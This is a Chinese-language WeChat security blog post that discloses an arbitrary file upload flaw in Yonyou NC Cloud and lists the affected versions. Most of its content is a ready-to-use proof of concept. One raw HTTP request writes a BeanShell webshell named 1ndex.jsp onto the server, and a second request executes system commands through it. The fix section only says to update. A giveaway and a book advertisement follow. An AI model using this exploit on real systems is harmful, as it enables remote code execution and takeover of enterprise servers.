0x01 前言
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。
该系统存在任意文件上传漏洞,攻击者利用该漏洞可以执行命令,控制服务器权限。
0x02 影响版本
NC63、NC633、NC65
NC Cloud1903、NC Cloud1909
NC Cloud2005、NC Cloud2105、NC Cloud2111
0x03 漏洞复现
PoC如下:
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 192.168.0.11:8089
Content-Length: 249
Accept: */*
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/1ndex.jsp"]}
发送该请求,如下利用成功!
访问1ndex.jsp,命令执行成功!
https://192.168.0.11:8089/1ndex.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())
GET /1ndex.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream()) HTTP/1.1
Host: 192.168.0.11:8089
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
0x04 修复方案
建议及时更新
【宠粉福利】
1. 开奖时间:8月20日12:00
2. 活动规则:
注意是点击下方名片发暗号"抽奖"
或扫码参与即可
② 必要条件:开奖前转发本文到朋友圈,开奖前不可删除,开奖后转发无效;
③ 开奖结束后,请中奖小伙伴及时将中奖信息和朋友圈转发记录发送到微信:BCathack,超过24小时未领取的视为自动放弃哈!!!
未满足②条件但被抽中,则获奖资格会被取消哦
中奖绝缘体也没关系,可以在这里下单买哈~
有需要自取~~
Web安全领域的小伙伴,大都应该看过科学家级天才黑客道哥吴翰清的《白帽子讲Web安全》!
这本书,可谓安全从业者的标配,不仅国内小伙伴给出的好评如潮,收获了豆瓣8.2的高分,还被美国斯普林格出版社隆重引进在全球发行英文版,这在安全著作中也是独一份的待遇!!!
如今,时光荏苒,距本书第1版的出版转眼过去了11年,第2版也是时候隆重登场了!
往期回顾
原文始发于微信公众号(EchoSec):【0Day | 福利抽奖】用友NC-Cloud漏洞Getshell(附EXP)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论